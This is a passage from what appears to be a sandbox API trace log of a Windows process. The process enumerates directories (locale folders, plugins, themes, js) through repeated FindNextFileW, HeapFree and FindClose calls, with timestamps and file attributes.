ftLastWriteTime.dwLowDateTime=0xefe20919, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0175.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.491] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefdfa6fb, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdfa6fb, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe20919, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0175.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.492] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefdfa6fb, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdfa6fb, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefdfa6fb, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0175.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.492] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe46ba5, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe46ba5, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe46ba5, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0175.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.492] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe20919, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe20919, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe20919, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0175.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.492] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe20919, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe20919, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe20919, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0175.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.492] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefdd469f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdd469f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefdfa6fb, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0175.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.493] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefdd469f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdd469f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefdd469f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0175.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.493] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe46ba5, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe46ba5, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeff9e0af, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugins", cAlternateFileName="")) returned 1 [0175.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.494] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff9e0af, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeff9e0af, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeff9e0af, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="selection-action-plugins", cAlternateFileName="SELECT~1")) returned 1 [0175.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3dcac | out: lpFindFileData=0x3b3dcac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff9e0af, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeff9e0af, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeff9e0af, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="epdf", cAlternateFileName="")) returned 1 [0175.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.495] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3dcac | out: lpFindFileData=0x3b3dcac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff9e0af, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeff9e0af, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeff9e0af, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="epdf", cAlternateFileName="")) returned 0 [0175.496] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0175.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.496] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff9e0af, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeff9e0af, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeff9e0af, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="selection-action-plugins", cAlternateFileName="SELECT~1")) returned 0 [0175.496] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0175.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.496] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe46ba5, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe46ba5, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeff9e0af, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugins", cAlternateFileName="")) returned 0 [0175.496] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0175.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.498] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefdd469f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdd469f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe46ba5, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0175.498] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.498] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02268b6, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02268b6, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02268b6, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="combinepdf", cAlternateFileName="COMBIN~1")) returned 1 [0175.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.560] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02268b6, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02268b6, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02268b6, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0175.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.565] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf024cb1c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf024cb1c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf024cb1c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0175.565] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0175.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.566] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf024cb1c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf024cb1c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf024cb1c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0175.566] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0175.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.566] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02bf3c0, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02bf3c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02bf3c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0175.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.569] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0357be9, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf0357be9, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf0357be9, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0175.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.570] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02bf3c0, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf02bf3c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf02bf3c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0175.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.570] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0357be9, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf0357be9, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf0357be9, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0175.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.571] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0175.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.572] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0175.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.573] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0175.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.573] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0357be9, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf0357be9, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf0357be9, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0175.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.574] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0175.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.574] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0175.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.575] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0357be9, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf0357be9, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf0357be9, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0175.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.575] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0175.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.576] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0357be9, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf0357be9, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf0357be9, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0175.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.577] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0357be9, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf0357be9, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf0357be9, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0175.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.577] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0175.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.577] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0175.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.578] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0175.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.578] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf037de3b, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf037de3b, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf037de3b, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0175.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.579] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf03a407f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf03a407f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf03a407f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0175.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.580] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0357be9, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf0357be9, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf0357be9, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0175.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 